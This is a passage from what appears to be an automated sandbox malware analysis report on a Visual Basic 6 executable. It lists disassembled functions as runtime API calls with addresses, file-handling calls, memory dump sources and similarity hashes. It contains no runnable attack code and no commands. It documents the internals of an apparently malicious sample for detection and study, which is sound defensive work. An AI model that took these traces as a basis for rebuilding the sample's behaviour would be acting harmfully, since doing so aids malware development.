                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041314C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041317F
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 0041320C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413234
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413252
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413270
                                                                                                                                                            • #537.MSVBVM60(00000000,?), ref: 004132B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132C3
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132CD
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000), ref: 004132D2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132DC
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132DF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132E9
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000), ref: 004132EE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132F8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132FB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413305
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041332C
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 00413355
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041335F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00413362
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041336C
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 00413377
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413381
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00413384
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041338E
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 00413399
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004133A3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004133A6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004133B0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 004133D7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413434
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413487
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041349F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004134BF
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004134D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413516
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413548
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 004135CC
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413610
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413645
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413654
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413667
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041368D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041369E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004136D5
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413706
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413715
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413728
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413748
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413757
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413786
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 004137B7
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 004137C6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004137D9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004137F9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041382A
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 0041385F
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 0041386E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413885
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004138B8
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413900
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413935
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413944
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413957
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041397D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041398E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004139C5
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 004139F6
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413A05
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A18
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A38
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413A47
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A76
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413AA7
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413AB6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AC9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AE9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B1A
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413B4F
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413B5E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B75
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B93
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406E00,00000000), ref: 00413BB0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413BBA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413BC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413BD2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413C2A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C79
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C91
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CAD
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 00413CC2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CF5
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D0D
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D29
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 00413D49
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 00413D57
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 00413D5A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 00413D64
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?), ref: 00413D6C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,?), ref: 00413DC0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413DCA
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00413DCE
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00413E47
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,00000008,?), ref: 00413E72
                                                                                                                                                            • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 00413EA0
                                                                                                                                                            • #606.MSVBVM60(00000000,?,00000008,?), ref: 00413EAD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EB7
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413EBA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EC4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000008,?), ref: 00413ECC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00413ED8
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413EEA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F02
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F1A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F32
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F4A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F62
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F7A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F92
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413FAA
                                                                                                                                                            • #606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00413FC9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FD3
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00413FD8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FE6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413FE9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FF3
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00413FF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414006
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414009
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414013
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00414018
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414026
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414029
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414033
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00414038
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414046
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414053
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414058
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414066
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414069
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414073
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414078
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414086
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414089
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414093
                                                                                                                                                            • #606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 0041409F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140A9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140B6
                                                                                                                                                            • #581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004140BE
                                                                                                                                                            • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 004140C4
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 004140CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140D9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140E6
                                                                                                                                                            • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004140EB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140F9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140FC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414106
                                                                                                                                                            • #606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00414112
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041411C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041411F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414129
                                                                                                                                                            • #537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0041412E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041413C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041413F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414149
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414155
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041415F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414162
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041416C
                                                                                                                                                            • #537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 00414171
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041417F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414182
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041418C
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414198
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141A2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141A5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141AF
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004141B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141C2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141C5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141CF
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004141DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141E5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141F2
                                                                                                                                                            • #537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 004141F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414205
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414208
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414212
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0041421E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414228
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041422B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414235
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0041423A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414248
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041424B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414255
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0041425A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414268
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041426B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414275
                                                                                                                                                            • #537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 0041427A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414288
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041428B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414295
                                                                                                                                                            • #606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004142A1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142AE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142B8
                                                                                                                                                            • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004142BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142CB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142CE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142D8
                                                                                                                                                            • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004142DD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142EB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142EE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142F8
                                                                                                                                                            • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00414304
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041430E
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414311
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041431B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00414325
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041432F
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414498
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 004144DF
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00414AEA
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00414AFC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00414B0E
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00414B18
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00414B20
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00414B2C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00414B34
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00414B37
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00414B47
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00414D6B,?,00000000), ref: 00414D44
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D53
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D58
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D60
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D68
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 00414D8A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                                                                                            • String ID: $&H68$&HA8$h#@
                                                                                                                                                            • API String ID: 3305104701-1988485601
                                                                                                                                                            • Opcode ID: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                            • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                                                                                                                            • Opcode Fuzzy Hash: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                            • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                                                                                                                            Function 00403A5C Relevance: .1, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                            • Instruction ID: 082b4fd57fed1769b9006e205b6e9b322f4e6cb11cfcb06b4efda431eea04361
                                                                                                                                                            • Opcode Fuzzy Hash: 9c9b5fadcff6fc1b6333f2045a5fcfbe11ec3f7d18c2f0a438c4e6aacca40780
                                                                                                                                                            • Instruction Fuzzy Hash: 85014FA644E3D24FC31387344CA49917FB0AD2311534A02DBC581CB1A3E208994AD762
                                                                                                                                                            Function 00415660 Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CFA6537,00000000,00000000), ref: 004156CA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
